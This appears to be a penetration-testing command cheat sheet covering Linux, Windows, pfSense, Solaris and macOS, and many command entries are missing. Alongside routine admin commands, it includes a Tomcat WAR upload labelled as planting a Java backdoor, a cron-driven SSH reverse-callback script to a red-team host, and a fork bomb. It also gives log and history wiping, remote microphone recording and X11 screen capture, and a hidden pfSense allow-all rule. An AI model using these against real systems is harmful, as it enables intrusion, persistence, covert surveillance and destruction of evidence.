Network commands



watch ss -tp

Watch network connections live

netstat -ant

TCP or UDP connections (-anu for UDP)

netstat -tulpn

Listening sockets with their owning PIDs

lsof -i

Established connections

smb://ip/share

Access an SMB share

share user x.x.x.x c$

Mount the shared Windows environment

smbclient -U user \\\\ip\\share

Connect to SMB

ifconfig eth# ip/cidr

Set IP and netmask

ifconfig eth0:1 ip/cidr

Set up a virtual interface

route add default gw gw_ip

Set the default gateway

ifconfig eth# mtu [size]

Change the MTU size

export MAC=xx:xx:xx:xx:xx:xx

Change the MAC (store the new address in a variable)

ifconfig int hw ether $MAC

Change the MAC

macchanger -m MAC int

Change the MAC (Backtrack)

iwlist int scan

Scan for Wi-Fi networks

nc -lvvp port

Listen on a specific port

python3 -m http.server port

Start a simple web server

dig -x ip

Reverse lookup: find the hostname for an IP

host ip

Reverse lookup: find the hostname for an IP

host -t SRV _service

Identify a domain's SRV records

dig @ip domain -t AXFR

Attempt a DNS zone transfer

host -l domain namesvr

Attempt a DNS zone transfer

ip xfrm state list

Show available VPN

ip addr add ip/cidr dev eth0

Add a 'hidden' interface address

cat /var/log/messages | grep DHCP

List DHCP assignments

tcpkill host ip and port port

Block traffic to ip:port

echo "1" > /proc/sys/net/ipv4/ip_forward

Enable IP forwarding

echo "nameserver x.x.x.x" >> /etc/resolv.conf

Add a DNS server

showmount -e ip

Show exported mount points

mkdir /site_backups; mount -t nfs ip:/ /site_backups

Mount the root share exported by ip

System information



nbtstat -A ip

Get the hostname for ip


Current username


Logged in user

who -a

User information

last -a

Last logged-in users

ps -ef

Running processes (or use top)

df -h

Disk usage (or use free for memory)

uname -a

Show kernel version and processor architecture


Mount the file system

getent passwd

Display the list of users


Add variable to PATH

kill pid

Kill process with pid

cat /etc/issue

Display operating system information

cat /etc/*release*

Display operating system version information

cat /proc/version

Display kernel version information

rpm --query --all

Installed packages (Red Hat)

rpm -ivh *.rpm

Install RPM packages (-e to remove)

dpkg --get-selections

Installed packages (Ubuntu)

dpkg -i *.deb

Install DEB packages (-r to remove)


Installed packages (Solaris)

which tcsh/csh/ksh/bash

Show the paths of the shell executables

chmod -so tcsh/csh/ksh

Disable other shells to force use of bash

find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

Find SUID files

find / -uid 0 -perm -4000 -type f 2>/dev/null

Find root-owned SUID files

find / -writable ! -user $(whoami) -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null

Find writable files not owned by the current user

Utility commands



python -c "import pty;pty.spawn('/bin/bash')"

Spawn an interactive TTY shell

wget http://url -O url.txt -o /dev/null

Fetch a URL into a file (quietly)

rdesktop ip

Remote desktop to ip

scp /tmp/file user@x.x.x.x:/tmp/file

Send a file

scp user@remoteip:/tmp/file /tmp/file

Get a file

useradd -m user

Add a user (with home directory)

passwd user

Change a user's password

rmuser user

Delete a user

script -a outfile

Record the shell session to outfile: Ctrl-D to stop

apropos subject

Find related commands


History of user commands

!num

Execute line num from history

id_rsa > ssh-key

Find the passphrase

john ssh-key

Find the passphrase

ssh -i id_rsa user@ip

Connect with key and passphrase

id -u

Get user id

cut -d: -f3 < <(getent group GROUPNAME)

Get group id

curl -G '' --data-urlencode 'cmd=echo ssh-rsa AA...'

Send URL-encoded data with a GET request in curl

curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "


Create a Java backdoor by uploading a WAR file

File commands

collection of lines


diff file1 file2

Compare two files

rm -rf dir

Force-delete a directory and everything nested in it

shred -f -u file

Overwrite and then delete the file

touch -r ref_file file

Copy the timestamp of ref_file onto file

touch -t YYYYMMDDhhmm[.ss] file

Set the file timestamp

sudo fdisk -l

List connected drives

mount /dev/sda# /mnt/usbkey

Mount a USB device

md5sum -t file

MD5 hash of a file

echo -n "str" | md5sum

MD5 hash of a string

sha1sum file

SHA-1 hash of a file

sort -u

Sort and show only unique lines

grep -c "str" file

Count lines matching str in file

grep -Hnri word * | vim -

Search files for word and open the matches (file name and line number) in vim

grep -rial word .

List files containing word (case-insensitive)

tar cf file.tar files

Create .tar from files

tar xf file.tar

Extract .tar

tar czf file.tar.gz files

Create .tar.gz

tar xzf file.tar.gz

Extract .tar.gz

tar cjf file.tar.bz2 files

Create .tar.bz2

tar xjf file.tar.bz2

Extract .tar.bz2

gzip file

Compress the file to file.gz

gzip -d file.gz

Decompress file.gz

upx -9 -o out.exe orig.exe

Pack orig.exe with UPX into out.exe

zip -r zipname.zip directory/

Create a zip archive

dd skip=1000 count=2000 bs=1 if=file of=file

Cut bytes 1 KB to 3 KB out of the file

split -b 9K file prefix

Split the file into 9 KB pieces

awk 'sub("$","\r")' unix.txt > win.txt

Convert to a Windows-compatible text file (CRLF line endings)

find . -iname '*.pdf' -type f

Search for PDF files

find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;

Find SUID/SGID files

dos2unix file

Convert to *nix line endings

file file

Determine the file type and format

chattr (+/-)i file

Set or clear the immutable bit

while [ $? -eq 0 ]; do cd flag/; done

Descend through nested flag/ directories until none remains

Miscellaneous commands




Disable reports in history

ssh user@ip arecord - | aplay -

Record the remote microphone

gcc -o outfile myfile.c

Compile C (use g++ for C++)

init 6

Reboot (init 0 = shutdown)

cat /etc/*syslog*.conf | grep -v "^#"

List the log files in use

grep 'href=' file | cut -d"/" -f3 | grep url | sort -u

Extract links

dd if=/dev/urandom of=file bs=3145728 count=1

Create a 3 MB file

Log and history cleanup commands



echo "" > /var/log/auth.log

Empty the auth.log file

echo "" > ~/.bash_history

Clear the current user's bash history file

rm ~/.bash_history -rf

Delete the .bash_history file

history -c

Clear the current session's history


Set the maximum size of the history file to zero

export HISTSIZE=0

Set the maximum number of commands kept in history to zero


Delete history (log in again to apply)

kill -9 $$

Kill the current shell session

ln /dev/null ~/.bash_history -sf

Permanently send all history to /dev/null

File system structure




System binary files


Files related to the boot process


Interfaces related to system devices


System configuration files


A basic place for users and libraries


Essential software libraries


Running and system processes


The base path for the root user


Root user's executables


Temporary files


Non-essential files


Variable data files





Hash of local users


Local users


Local groups


Startup services




List of hostnames and IPs


Show hostname along with domain


Network communication


System environment variables


list of ubuntu distribution sources


Nameserver settings

/home/user/.bash_history

bash history (also in /root/)


MAC Manufacturer


Location of ssh keystores


System reports file (for Linux)


System reports file (for Unix)


List of files in cron


Apache communication reports


Static file system information

Using PowerShell


sudo apt install gss-ntlmssp
sudo apt-get install powershell

Log in using a username and password

$offsec_session = New-PSSession -ComputerName -Authentication Negotiate -Credential k.svensson
Enter-PSSession $offsec_session
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'

Scripting

Ping sweep

for x in {1..254..1}; do ping -c 1 1.1.1.$x | grep "64 b" | cut -d" " -f4 >> ips.txt; done

Automate domain name resolution in a bash script

echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254..1}; do
host $range.$ip | grep "name pointer" | cut -d" " -f5   # field 5 is the hostname (the cut field was truncated on the page and is completed here)
done

Fork bomb (spawns processes until the system crashes)

: (){:|: & };:

DNS reverse lookup loop

for ip in {1..254..1}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done

IP ban script (static ARP entries)

#!/bin/bash
# This script bans any IP in the /24 subnet starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]
do
  if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
    echo "BANNED: arp -s 192.168.1.$i"
    arp -s 192.168.1.$i 00:00:00:00:00:0a
  else
    echo "IP NOT BANNED: 192.168.1.$i"
  fi
  i=`expr $i + 1`
done

Create an SSH callback

Set up the script in crontab to call back every X minutes. It is highly recommended that you
set up a generic user on the red team computer (with no shell privileges). The script
will use the private key (located on the callback source computer) to connect
to the matching public key (on the red team computer). The red teamer then connects to the target via a
local SSH session (in the example below, use: ssh -p4040 localhost).

#!/bin/bash
# Callback: script located on callback source computer (target)
# LIVEHOST, REMLIS and REMUSR must be set before running; their values are not given on this page
killall ssh > /dev/null 2>&1
sleep 5
COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
if [[ $COUNT -gt 0 ]]; then
  ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N ${LIVEHOST} -l ${REMUSR}
fi

Iptables command

iptables for IPv6


iptables-save -c file

Export iptables rules to file

iptables-restore file

Restore iptables rules from file

iptables -L -v --line-numbers

List all rules with their line numbers

iptables -F

Flush all rules



Change the default policy applied when no rule matches

iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT

Allow related and established inbound connections

iptables -D INPUT 7

Delete rule number 7 from the INPUT chain

iptables -t raw -L -n

Increase throughput by disabling stateful tracking

iptables -P INPUT DROP

Drop all inbound packets by default

Allow SSH (port 22) outbound

iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

Allow ICMP outbound

iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT

Create a port forward

echo "1" > /proc/sys/net/ipv4/ip_forward
# OR: sysctl net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp -i eth0 -d pivotip --dport 443 -j DNAT --to-destination attackip:443
iptables -t nat -A POSTROUTING -p tcp -o eth0 -s target_subnet/cidr -d attackip --dport 443 -j SNAT --to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

Allow ports 80 and 443 inbound and log dropped packets to /var/log/messages

iptables -A INPUT -s src_ip -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

update-rc.d

Check and create startup services


service --status-all

[+] Service starts at boot

[-] Service does not start

service service start

start service

service service stop

stop service

service service status

Check service status

update-rc.d -f service remove

Remove the service from system startup (-f forces removal even if the /etc/init.d script still exists)

update-rc.d service defaults

Add the service to system startup


Available on Red Hat distributions such as CentOS and Oracle Linux



chkconfig --list

List services and their run-level status

chkconfig --list service

Status of one service

chkconfig service on [--level 3]

Enable the service [a run level can be specified]

chkconfig service off [--level 3] e.g. chkconfig iptables off

Disable the service

Screen command



screen -S name

Create a new screen session named name

screen -ls

List running screen sessions

screen -r name

Reattach to the screen session named name

screen -S name -X cmd

Send a command to the screen session named name


List key bindings (help)

C-a d

Detach

C-a D D

Detach and log out

C-a c

Create a new window

C-a C-a

Switch to the previous window

C-a ' num|name

Switch to the window with that number or name

C-a "

Show the window list and select one

C-a k

Kill the current window

C-a S

Split the display horizontally

C-a |

Split the display vertically

C-a tab

Move focus to the next region

C-a X

Remove the current region

C-a Q

Remove all regions except the current one


Capture a remote X11 display and convert it to JPG

xwd -display ip:0 -root -out /tmp/test.xpm
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

Capture X11 in stream mode

xwd -display ip:0 -root -silent -out x11dump
Read the dumped file with xwudtopnm or GIMP

TCPDump command

Capture packets on eth0, show them in hex and ASCII, and save them to a file

tcpdump -i eth0 -XX -w out.pcap

Capture all traffic to ip on port 80

tcpdump -i eth0 port 80 dst ip

Show all connections to ip from outside the local net

tcpdump -i eth0 -tttt dst ip and not net net/cidr

Show all ping replies

tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'

Capture 50 DNS packets and display timestamps

tcpdump -i eth0 -c 50 -tttt 'udp and port 53'

Kali default commands

WMIC equivalent

wmis -U DOMAIN\user%password //DC cmd.exe /c command

Mount an SMB share

# Mounts to /mnt/share. For other options besides ntlmssp, see man mount.cifs
mount.cifs //ip/share /mnt/share -o user=user,pass=pass,sec=ntlmssp


apt-get update
apt-get upgrade

Check the operating system for privilege escalation possibilities
Example: ./ -s -k keyword -r report -e /tmp/ -t

List all processes, including those run as root
For example: ./pspy64 -pf -i 1000

The PFSENSE command




Shell pfSense

pfSsh.php playback enableallowallwan

Allow inbound connections on the WAN (adds a hidden allow-all rule to the WAN rules)

pfSsh.php playback enablesshd

Enable inbound/outbound ssh

pfctl -sn

Show NAT rules

pfctl -sr

Show filter rules

pfctl -sa

Show all rules


Edit settings

rm /tmp/config.cache

Remove the cached config after editing so the new settings take effect


Reload the entire configuration

SOLARIS operating system



ifconfig -a

List of all interfaces

netstat -in

List of all interfaces

netstat -r

List routes

ifconfig eth0 dhcp

Start the DHCP client on the interface

ifconfig eth0 plumb up ip netmask nmask

Set the IP address

route add default ip

Set the default gateway

logins -p

List users with no password set

svcs -a

List of all services along with status

prstat -a

Status of processes (also command top)

svcadm start ssh

Start the SSH service

inetadm -e telnet (-d to disable)

Enable telnet

prtconf | grep Memory

Total physical memory

iostat -En

Hard disk size

showrev -c /usr/bin/bash

Binary information

shutdown -i6 -g0 -y

Restart the system


List of users connected to NFS


GUI management

snoop -d int -c pkt# -o results.pcap

Packet capture


Mounted system file table


Reports list of login attempts


Default settings


Kernel modules and settings


syslog path

/etc/auto*

Automounter settings file


IPv4 and IPv6 hosts files

Important cache files




vim editor file


Situational Awareness




shows real-time system statistics including CPU usage, memory usage, and running processes.

ps aux

displays a list of running processes with their associated details.


displays active network connections, routing tables, and a number of network interface and protocol statistics.

shows all active network connections and which processes are using them.


allows the capture and analysis of network traffic.

tail -f /var/log/system.log

displays real-time updates to the macOS system log.

log show --predicate 'process == "PROCESS_NAME"' --info

displays system log entries for a specific process.


shows real-time file system activity, including which files are being accessed and by which processes.


displays a graphical representation of file system activity.


allows the tracing and analysis of system events.

launchctl list

displays a list of all currently loaded launch daemons and agents.

User Plist File Enumeration




The user plist file for the currently logged-in user can be found in here


Other user plist files can be found in here

defaults read <path_to_plist_file>

Read a plist file

defaults write <path_to_plist_file> <key> <value>

Write a plist file

defaults delete <path_to_plist_file> <key>

Delete a key from a plist file

PlistBuddy -c "Open <path_to_plist_file>"

Open a plist file

PlistBuddy -c "Print <key>" <path_to_plist_file>

Print a value from a plist file

PlistBuddy -c "Add <key> <type> <value>" <path_to_plist_file>

Add a new key-value pair to a plist file

PlistBuddy -c "Delete <key>" <path_to_plist_file>

Delete a key from a plist file

PlistBuddy -c "Set <key> <value>" <path_to_plist_file>

Set the value of a key in a plist file

plutil -lint <path_to_plist_file>

Validate a plist file

plutil -convert xml1 <path_to_plist_file>

Convert a plist file to XML format

User & Group



sudo dscl . -create /Users/newusername

create a new user

sudo dscl . -passwd /Users/newusername password

set the user’s password

sudo dscl . -append /Groups/admin GroupMembership newusername

make the user an administrator

sudo dseditgroup -o create -r "Group Name" groupname

create a new group

sudo dseditgroup -o edit -a username -t user groupname

add users to the group

dscl . -read /Groups/groupname GroupMembership

list the members of a group

sudo dseditgroup -o delete groupname

delete a group

sudo dseditgroup -o edit -d username -t user groupname

remove a user from a group

sudo dseditgroup -o edit -n newgroupname -r oldgroupname

rename a group
